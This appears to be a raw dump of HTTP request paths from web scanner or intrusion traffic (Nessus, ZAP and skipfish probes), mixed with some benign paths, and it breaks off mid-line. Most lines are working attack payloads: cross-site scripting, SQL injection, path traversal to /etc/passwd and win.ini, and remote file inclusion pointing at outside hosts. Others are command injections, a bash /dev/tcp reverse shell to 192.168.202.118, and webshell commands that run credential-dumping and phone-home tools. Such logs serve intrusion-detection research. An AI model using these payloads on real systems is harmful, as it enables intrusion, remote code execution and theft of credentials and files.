moon/\n/recordings/cart32.exe\n/phpmyadmin/index.php?id=egyb16sayu'\n/ny1b3qq4.nsf?<script>cross_site_scripting.nasl</script>\nftp://192.168.22.152/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/top.php?stuff=\"&del\\x0cq74447142&rem\\x0c\n/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login\n/examples/jsp/num/review.php?id=1&cat=&subcat=\"><script>alert('phpmydirectory_multiple_xss.nasl');</script>\n/iissamples/exair/search/query.idq?citemplate=../../../../../../../../../../winnt/win.ini\n/yver8r9o.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bin/testcgi.exe\n/menu-description/\n/javascript/test1234.exe\n/scgi-bin/gw5/gwweb.exe?htmlver=aaa&get-context\n/top.php?stuff=\"&ping\\xa0-w\\xa09000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/webcgi/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/1qwv2p5p.jsp?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/help.php?q=\"&del q31935143&rem \n/cacti/themes/program/themesettings.inc.php?themesdir=/etc/passwd\\x00\n/en-us/9kr0ih0v.fts?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/6dlc2zm9.mscgi?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/ping_scripts/\n/r3le3om5.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n//q47417758&#x26;q6971&#x22;q6971&#x3c;q6971&#x3e;q47417758\n/mv8wxfy9.dll?<script>document.cookie=\"testrhbc=8184;\"</script>\n/examples/jsp/jsp2/jspx/doc/index.php?s=/etc/passwd\\x00\n/o1zj4u9v.x?<script>document.cookie=\"testabrn=6368;\"</script>\n/script/menu/menuprincipal.php?path_inc=http://cirt.net/rfiinc.txt?\n/cacti/core/editor.php?editor_insert_bottom=/etc/passwd\n/examples/jsp/cal/index.php?op=default&date=200607' union select 1,1085399282,1,1,1,1,1,1,1,1--&blogid=1\n/manager/shopaddtocart.asp?productid='42\n/cgi-bin/login.php?error=>\"><script>alert('daloradius_error_xss.nasl')</script>\n/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.118:8080/zz5thkvtmlgl?\\x00\n/projects/1/repository/annotate?rev=`0<&173-;exec 173<>/dev/tcp/192.168.202.118/21785;sh <&173 >&173 2>&173`\n/vjbrrppi.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=&ver >q73636738&rem \n/examples/jsp/jsp2/jspx/adlayer.php?layerstyle=../../../../../../../etc/passwd\\x00\n/vwmg565s.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/starnet/addons/slideshow_full.php?album_name='1590453229\n/uvazfs7p.cfc?<script>document.cookie=\"testwtbo=4831;\"</script>\n/officescan/console/html/cgi/cgichkmasterpwd.exe\n/s7qus4g3.do?<script>cross_site_scripting.nasl</script>\n/cacti/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/examples/jsp/sessions/index.php?user_langue=../../../../../../../../../../etc/passwd\n/examples/jsp/checkbox/starnet/addons/slideshow_full.php?album_name='1511206364\n/3hlysl2x.cfm?<script>document.cookie=\"testgjbe=8505;\"</script>\n/top.php?stuff=&ver\\x09>q17672958&rem\\x09\n/top.php?stuff=\"&ver;>q42621598&rem;\n/cgi-915/query?mss=../config\n/webscarabxss/\n/javascript/caller.exe\n/javascript/rsa.exe\n/subscriptions.meta\n/manager/index.php?template=../../../loudblog/custom/config.php\\x00\n/awstats/awstats.pl?migrate=|echo;/./tmp/cegnlginfc.sh;echo|awstats119356.txt\n/interface/login/login_frame.php?site=<script>alert(owasp zap);</script> and 1=2\n/subscriptioninfo/\n/forum_arc.asp?n=/....../boot.ini|36|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/iv5vkgam.php3?<meta http-equiv=set-cookie content=\"testfosd=94\">\n<script>document.cookie=\"testhvje=9403;\"</script>\n/inscription/\n/cacti/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\\x00\n/webdav/c99.php?act=cmd&d=c:\\xampp\\webdav\\&cmd=c:\\xamp\\webdav\\phonehome_script.exe+-h+recompiler&cmd_txt=1&submit=execute\n/scripts/search.jsp?q=%\"<script>alert(1332008604)</script>\n/javascript/axis2-admin.exe\n/bxnyrhmh.jsp?<script>document.cookie=\"testmjct=1867;\"</script>\n/main.php?stuff=\"del\\xa0q33347165&rem\\xa0\n/javascript/zope.exe\n/include/scripts/export_batch.inc.php?dir=http://192.168.202.96:8080/txenjrxf3?\n/path_script/createurl.php?formurl=http://192.168.202.96:8080/vir0v3xfc?\n/productsbycategory.asp?intcatalogid=3'&strcatalog_name=nessus\n/1r8cfrlf.pl?<script>document.cookie=\"testydan=5106;\"</script>\n/ans.pl?p=../../../../../usr/bin/id|&blah\n/the scientist & engineer's guide to digital signal processing/\n/h5sc3gxy.jspa?<script>cross_site_scripting.nasl</script>\n/phpmyadmin//..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xafwindows/win.ini\n/manager/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params\"having 1=1\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/pzeceeynoq0+>+/dev/null+&'); function v\n/examples/servlets/servlet/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini\n/cacti/index.php?id='\n/scripts/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;\n/event_description/\n/cacti/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd\n/5qnlm5z2.idc?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/mpcgi/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/main.php?logout=\"\\x0duname >q11745557 #\n/5qnlm5z2.html?<script>document.cookie=\"testsixi=8451;\"</script>\n/manager/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\\x00\n/examples/jsp/cal/htsearch?exclude=`/etc/passwd`\n/help.php?q=ver,>q21492123&rem,\n/cgi-915/gw5/gwweb.exe?help=bad-request\n/d765w06j.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/i686v90l.php3?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/d7ktpmcq.jsp?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"&ping\\x09-w\\x0911000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/javascript/robots.exe\n/82q7ywa8.html?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/phpmyadmin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331923204','5'--\n/help.php?q=\"&ver\\x0b>q26193259&rem\\x0b\n/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosconfig_absolute_path=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/main.php?logout=|ping;-w;9000;-n;1;1.2.3.4|rem;\n/learnjscript/\n/recordings/mlog.html?screen=/etc/passwd\n/scripts/xtextarea.scr.php?globals[pth][spaw]=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/nyjgaorz.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"|ping;-w;8000;-n;1;1.2.3.4|rem;\n/xlj7h65o.asp?<script>document.cookie=\"testtbbe=856;\"</script>\n/rv98iwjp.php3?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/rss.php?blogid=1&profile=../../config/config.properties.php\\x00\n/javascript/webshop.exe\n/bin/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919143&lang_crm=../../../../../../../../../../../..//boot.ini\\x00\n/cgi-bin/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_y1ahivl4]));die;/*\n/nmw0do67.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/faq.php?action=&type=view&s=&id=-1' union select 0,1702272795,0,0,0,0,0--\n/manager/core/api.php?t_path_core=/etc/passwd\\x00\n/pxagj7n7.dll?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"del\\xa0q89318346&rem\\xa0\n/examples/jsp/num/notify?from=nessus\"|id\"\n/javascript/document.ep\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\n/<script>document.cookie=\"testquyx=2820;\"</script>\n/sysuser/docmgr/iecreate.stm?template=../\n/um7xpn15.x?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/scripts/yfmo7jpwvpv1.asp\n/include/default_header.php?script_path=http://cirt.net/rfiinc.txt?\n/cgis/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/main.php?logout=\"\\x0drm q11745557 #\n/examples/jsp/colors/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\\x00\n/ttxssh2_213/\n/9o6g5vkn.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/docs/index.php?lang=/../../../../../../../../../../etc/passwd\\x00\n/cgi-bin/cvsblame.cgi?file=<script>alert('vulnerable')</script>\n/top.php?stuff=\"&ping\\x09-w\\x0910000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/cgi-914/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/it's a wonderful life - alchemy_rg/\n/cgi-bin/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd\n/examples/jsp/sessions/faxsurvey?cat /etc/passwd\n/scripts/news.scr.php?globals[pth][classes]=http://192.168.202.118:8080/zz5thkvtmlgl??\n/video_subscription/\n/post.asp?method=topic&forum_id=1&cat_id=1&type=wvs-xss-magic-string-410016083323\n/o6ebbirj.idc?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"&ver,>q17457396&rem,\n/examples/jsp/error/supporter/tupdate.php?groupid=change&sg='\n/p043snfr.asp?<script>cross_site_scripting.nasl</script>\n/t3af3tdz.jspa?<script>cross_site_scripting.nasl</script>\n/l752x1ry.exe?<script>cross_site_scripting.nasl</script>\n/scriptpath/index.php?page=http://192.168.202.96:8080/whmch8ftkt7kv?\n/subscriptiontab/\n/serversidescripting/\n/t3af3tdz.dll?<script>cross_site_scripting.nasl</script>\n/hipkz026.jspa?<script>document.cookie=\"testyrbs=2855;\"</script>\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904220&lang_crm=../../vtigerservice.php\\x00\n/n9xlumt5.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\\x00\n/n1afe1y6.asp?<script>cross_site_scripting.nasl</script>\n/search.php?do_search=search&searchword=\"/><script>alert(\"411665577524\");</script><\"1&catid_search=0\n/forum1.asp?n=1753&amp;nn=/etc/passwd\n/m4kkjf8l.dll?<script>document.cookie=\"testyglc=8988;\"</script>\n/help.php?q=\"|ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/examples/jsp/num/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>\n/script_path/config.inc.php?_path=@rfiurl?_path=@rfiurl?\n/chat_script/\n/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.118:8080/zz5thkvtmlgl?\\x00\n/fcgi-bin/windmail.exe\n/3m5knyc4.asp?<script>document.cookie=\"testbgqj=6434;\"</script>\n/order/login.php?svr_rootscript=http://192.168.202.118:8080/ghl9il?\n/verify.asp?username='\n/en-us/i686v90l.fts?<script>document.cookie=\"testfutf=1550;\"</script>\n/d44uk9h2.htm?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/javascript/subscribe.exe\n/webdav/phprun.php?cmd=c:\\wce.exe -l\n//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd\n/'.$_server['php_self'].'?act=img&img=delete\n/yver8r9o.nsf?<script>cross_site_scripting.nasl</script>\n/gy23xnjq.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331919001\n/cgi-bin/scripts/*\\x0a.pl\n/javascript/monthly.exe\n/cacti/shared/help.php?page=../../../../../../../../../../etc/passwd\\x00\n/javascript/check.exe\n/169okeyj.nsf?<script>document.cookie=\"testxeoi=3573;\"</script>\n/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/txenjrxf3?\\x00\n/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.118:8080/iroy1gvqrrqu?\n/scripting-r0/\n/examples/jsp/checkbox/snpfiltered.pl?t=c&u=<script>foo</script>\n/webcgi/fileseek.cgi?foot=;cat /etc/passwd&head=\n/<script>cross_site_scripting.nasl</script>.dll\n/lmw4r201.asp?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/examples/jsp/error/forum_2.php?msg=10&return=<script>foo</script>\n/examples/jsp/sessions/web_store/web_store.cgi?page=../../../../../../etc/passwd\\x00.html\n/<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/jnv890lt.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331909407','5'--\n/examples/servlets/servlet/edit.jsp?page=user&editor=../../../install\n/eei78ore.do?<script>cross_site_scripting.nasl</script>\n/javascript/compressed.exe\n/main.php?stuff=\"uname >q49686563 #\n/top.php?stuff=ver\\x0b>q36516596&rem\\x0b\n/top.php?stuff=\\x0auname\\x09>q15522652\\x09#\n/cacti/index.php?album=../../../../../../../../../../etc/passwd\\x00\n/zul'gurub/\n/examples/jsp/error/port.php?proto=tcp'\n/recordings/port.php?proto=tcp'\n/examples/jsp/num/simple/view_page?mv_arg=|cat /etc/passwd|\n/scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file&currentfolder=/fckeditor_currentfolder_file_upload-1331904471.php.\n/recordings/directory.php?dir=;cat /etc/passwd\n/examples/jsp/sessions/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini\n/examples/jsp/cal/user.cgi?url=\"><script>alert(\"gossamer_links_url_xss.nasl\");</script>&from=add\n/weq93ppb.pl?<script>cross_site_scripting.nasl</script>\n/pxtoolbar.exe/\n/examples/servlets/servlet/shopaddtocart.asp?productid='42\n/jnv890lt.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/edit.jsp?page=user&editor=../../../install\n/d5a5renl.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee61586800228~\n/ddoworrl.idc?<script>document.cookie=\"testvlau=8517;\"</script>\n/en-us/fo564rei.htm?<script>cross_site_scripting.nasl</script>\n/webmaster-scripts/\n/.svn/text-base/.htpasswd.svn-base\n/main.php?stuff=\"ver\\x0b>q36113668&rem\\x0b\n/downloads/pafiledb.php?action=rate&id=4?\\\"&lt;script&gt;alert('vulnerable')&lt;/script&gt;\\\"\n/examples/jsp/cal/cal2.jsp?time=8am style=xss:e/**/xpression(try{a=firsttime}catch(e){firsttime=1;alert('tomcat_sample_cal2_xss2.nasl')});\n/cacti/search.php?searchstring=<script>foo</script>\n/iajtej82.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/showproduct.php?product=1'\n/esmozg5d.htm?<script>cross_site_scripting.nasl</script>\n/en-us/hipkz026.dll?<script>document.cookie=\"testyrbs=2855;\"</script>\n/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1247962577,2,176146104,4,5,6,7,8,9,0,1,2,3 --\n/help.php?q=\"\\x0drm\\x09q93881688\\x09#\n/javascript/cookie.exe\n/edzaia0i.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script/menu/menuprincipal.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?\n/main.php?logout='&sleep\\x0910\\x09#\n/scripts/.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./winnt/win.ini\n/script/ident/loginliste.php?path_inc=http://192.168.202.118:8080/ghl9il?\n/index.php?id='union/**/select/**/0,0,1888865436,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/scripts/\n/d5a5renl.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/i7prbs22.fts?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/javascript/controller.exe\n/0u75ldxq.jspa?<script>cross_site_scripting.nasl</script>\n/x2gyorli.kspx?<script>document.cookie=\"testwhac=3130;\"</script>\n/magazine_subscriptions/\n/help.php?q='&del\\x09q11888742\\x09#\n/scriptpath/index.php?page=http://192.168.202.118:8080/zz5thkvtmlgl?\n/help.php?q=\"\\x0arm\\x09q76195479\\x09#\n/scripts/event_view.php?eid=34 union select 125016811\n/scripts/9pen4xzgztjn.inc\n/aj3pf49c.exe?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/phpmyadmin/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini\n/cgi-bin/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl\n/scripts/calendar_admin.pl?config=|cat /etc/passwd|\n/cgi-sys/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/ywaxntrx.do?<script>cross_site_scripting.nasl</script>\n/7uz3ok60.cfc?<script>cross_site_scripting.nasl</script>\n/zroo33l4.nsf?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/interface/login/login_frame.php?site=<script>alert(owasp zap);</script>;waitfor delay '0:0:15';--\n/examples/jsp/colors/cal_make.pl?p0=../../../../../../../../../etc/passwd\\x00\n/help.php?q=\";sleep 9 #\n/phpmyadmin/search.jsp?q=%\"<script>alert(1331904224)</script>\n/examples/jsp/checkbox/item.fts?href=\"><script>alert(\"ftgate_44002.nasl\")</script>;\n/examples/servlets/servlet/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\\x00\n/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1332008335,1,1403210863--\n/scripts/msg.txt\n/scripts/x_news.php\n/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\\x00\n/main.php?stuff=\"|ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/liiwypqnoh.sh'); function v\n/ovcgi/getnnmdata.exe\n/scripts/1331919077-ror_session_fixation.nasl\n/examples/jsp/colors/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold\n/top.php?stuff=\"\\x0arm q56276124 #\n/6dlc2zm9.nsf?<script>document.cookie=\"testqpux=4016;\"</script>\n/examples/servlets/servlet/mlog.html?screen=/etc/passwd\n/top.php?stuff='sleep 11 #\n/en-us/account/index.php?id=mumrj3sj0o'\n/zv8tv7h8.htm?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/scripts/6gl21a1hiz3s.cfm\n/b4vng02k.aspx?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/dda2qr7j.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"ping\\xa0-w\\xa011000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/examples/servlets/servlet/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd\n/odzk29aa.htm?<script>document.cookie=\"testtfvh=2141;\"</script>\n/main.php?stuff=&ver\\x09>q82426871&rem\\x09\n/robocop director's cut/\n/ows-bin/c32web.exe/changeadminpassword\n/vac1l5vm.html?<script>cross_site_scripting.nasl</script>\n/cgi-perl/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/en-us/scripts\n/examples/jsp/sessions/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl\n/hipkz026.do?<script>document.cookie=\"testyrbs=2855;\"</script>\n/examples/jsp/error/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script>\n/scripts/c0kha6w3apd3.inc\n/help.php?q=';del\\x09q69988199\\x09#\n/main.php?logout=\"|ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/lsoix5h3.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script_path/cms/classes/openengine/filepool.php?oe_classpath=http://192.168.202.96:8080/4dckqcc0acprbz??\n/h5i6crm3.kspx?<script>document.cookie=\"testlihk=7070;\"</script>\n/help.php?q=\"\\x0duname >q66781813 #\n/iktok2bw.nsf?<script>cross_site_scripting.nasl</script>\n/en-us/account/javascript.php?abs_path=/etc/passwd\\x00\n/mpcgi/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/help.php?q='\\x0duname\\x09>q24981853\\x09#\n/cgi-scripts/\n/82q7ywa8.mscgi?<script>document.cookie=\"testpwew=1315;\"</script>\n/en-us/account/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331909400,244455451 -- \n/6qbynt4f.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/3j8echh0.dll?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/javascript/util.exe\n/mpcgi/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/33y9gcqq.html?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/w4996nr0.jspa?<script>document.cookie=\"testttvs=7163;\"</script>\n/javascript/scheduling.exe\n/help.php?q=\"ping -w 11000 -n 1 4.3.2.1&rem \n/main.php?stuff=\"|ping\\xa0-w\\xa09000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/examples/jsp/num/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\\x00gwextranet_template_dir_traversal.nasl\n/help.php?q=\"del\\x09q91583756&rem\\x09\n/scripts/gallery.scr.php?globals[pth][func]=http://192.168.202.118:8080/zz5thkvtmlgl??\n/169okeyj.do?<script>document.cookie=\"testxeoi=3573;\"</script>\n<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/i686v90l.php?<script>document.cookie=\"testfutf=1550;\"</script>\n/examples/jsp/colors/admin/top.php?admindir=/etc/passwd\\x00\n/fcgi-bin/gw5/gwweb.exe?help=bad-request\n/fc9t54l7.asp?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/ttxssh2_211/\n/examples/jsp/colors/search.jsp?q=%\"<script>alert(1331904373)</script>\n/scripts/admin/admin.cgi\n/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332009307','5'--\n/help.php?q=;uname >q94314237 #\n/examples/jsp/error/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;\n/mpcgi/gw5/gwweb.exe?htmlver=aaa&get-context\n/starnet/addons/slideshow_full.php?album_name='1055703356\n/phpmyadmin/cart32.exe\n/order/login.php?svr_rootscript=http://cirt.net/rfiinc.txt?\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008595&lang_crm=../../vtigerservice.php\\x00\n/edv3mapy.asp?<script>cross_site_scripting.nasl</script>\n/en-us/account/adlayer.php?layerstyle=../../../../../../../etc/passwd\\x00\n/awstats/awstats.pl?migrate=|echo;/./tmp/cbpxmnuvtn.sh;echo|awstats973506.txt\n/login.php?ref='><script>alert(413896083535)</script>\n/examples/jsp/jsp2/el/core/api.php?t_path_core=/etc/passwd\\x00\n/examples/jsp/checkbox/man-cgi?section=0&topic=ls;id\n/phpmyadmin/cal_make.pl?p0=../../../../../../../../../etc/passwd\\x00\n/cgi-home/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904228\n/revdescription/\n/phpmyadmin/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\\x00\n/qb2xy9aw.php?<script>cross_site_scripting.nasl</script>\n/main.php?frm_daynight=day&frm_passwd=q55541722&frm_referer=http%3a//192.168.23.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width=\n/pxagj7n7.php?<script>cross_site_scripting.nasl</script>\n/ddoworrl.html?<script>document.cookie=\"testvlau=8517;\"</script>\n/en-us/jnv890lt.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/qczkquis.jspa?<script>document.cookie=\"testkwlg=5591;\"</script>\n/cgi-bin/listrec.pl?app=qmh-news&template=;ls /etc|\n/scripts/base_main.php\n/resetpw.php?email=../../../../../../../../../../../../etc/passwd\n/examples/jsp/jsp2/el/a1disp3.cgi?/../../../../../../etc/passwd\n/javascript/.htpasswd.sfish/-->\">'>'\"<sfi000016v868621>\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331908854,0x3a,1781864537),3,4,5,6,7,8,9,10,11,12,13,14,15,16\n/top.php?stuff=\"|ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/x'squeezeme!_v3/\n/top.php?stuff=\"rm\\x0bq24192811&rem\\x0b\n/phpmyadmin/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd\n/manager/a1disp3.cgi?/../../../../../../etc/passwd\n/examples/servlets/servlet/hw3.cgi?daysonly=0).system('id').(\n/javascript/sell.exe\n/yver8r9o.kspx?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"ver\\x0b>q54818771&rem\\x0b\n/top.php?stuff=ver\\x0b>q41385468&rem\\x0b\n/main.php?stuff='\\x0arm\\x09q88589696\\x09#\n/cacti/_head.php?_zb_path=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/sessions/htmlscript?../../../../../../../../../etc/passwd\n/javascript/.passwd.gz\n/phpmyadmin/documentation.html?phpmyadmin=..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xafetc/passwd\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+555+/tmp/ftxarcvjda0;').\"]=1\n/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/sdk/../../../../../..//etc/vmware/hostd/vminventory.xml\n/subscriptions.tpl\n/en-us/ddoworrl.cfc?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/sdlffngmto0;'); function v\n/top.php?stuff=ping;-w;7000;-n;1;4.3.2.1|rem;\n/en-us/s7qus4g3.x?<script>cross_site_scripting.nasl</script>\n/main.php?stuff='&uname\\x09>q47285252\\x09#\n/nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=go&linecnt=500&refresh=0\n/examples/jsp/sessions/shoutbox.php?conf=../\n/examples/jsp/colors/simple/view_page?mv_arg=|cat /etc/passwd|\n/scripts/tradecli.dll?template=nonexistfile?template=..\\..\\..\\..\\..\\winnt\\system32\\cmd.exe?/c+dir\n/main.php?stuff=\"ping,-w,11000,-n,1,4.3.2.1|rem,\n/scripts/wsasp.dll/wservice=wsbroker1/webtools/oscommand.w\n/javascript/keep.exe\n/detail.php?id=-1'\n/console/faces/com_sun_web_ui/help/masthead.jsp?windowtitle=</title><script>alert('sun_java_web_console_helpwindow_xss.nasl')</script>\n/<script>alert('vulnerable')</script>.aspx\n/top.php?stuff=\"rm q85581856&rem \n/d7ktpmcq.do?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"&rm q91375949&rem \n/newssubscriptions/\n/t7tm4m0b.php?<script>cross_site_scripting.nasl</script>\n/yver8r9o.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jsorijscript/\n/examples/jsp/jsp2/jspx/wiki.php/<script>foo</script>\n/cgi-bin/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\\x00\n/cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331908709')</script>\n/0qhcnefz.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bxnyrhmh.idc?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/en-us/dda2qr7j.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/nyjgaorz.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=&ping;-w;7000;-n;1;4.3.2.1&rem;\n/cacti/config.php?returnpath=/etc/passwd\\x00\n/examples/jsp/jsp2/el/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/scripts/utilities/login.asp\n/en-us/w4996nr0.exe?<script>document.cookie=\"testttvs=7163;\"</script>\n/private's most beautiful breasts - silvia saint/\n/ao22ww7y.dll?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/help.php?q='\\x0drm q17837735 #\n/rubrique.asp?no=/....../boot.ini|55|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/help.php?q=\"&uname\\x09>q99796972\\x09#\n/help.php?q=\"&del q26584324&rem \n/qb2xy9aw.asp?<img 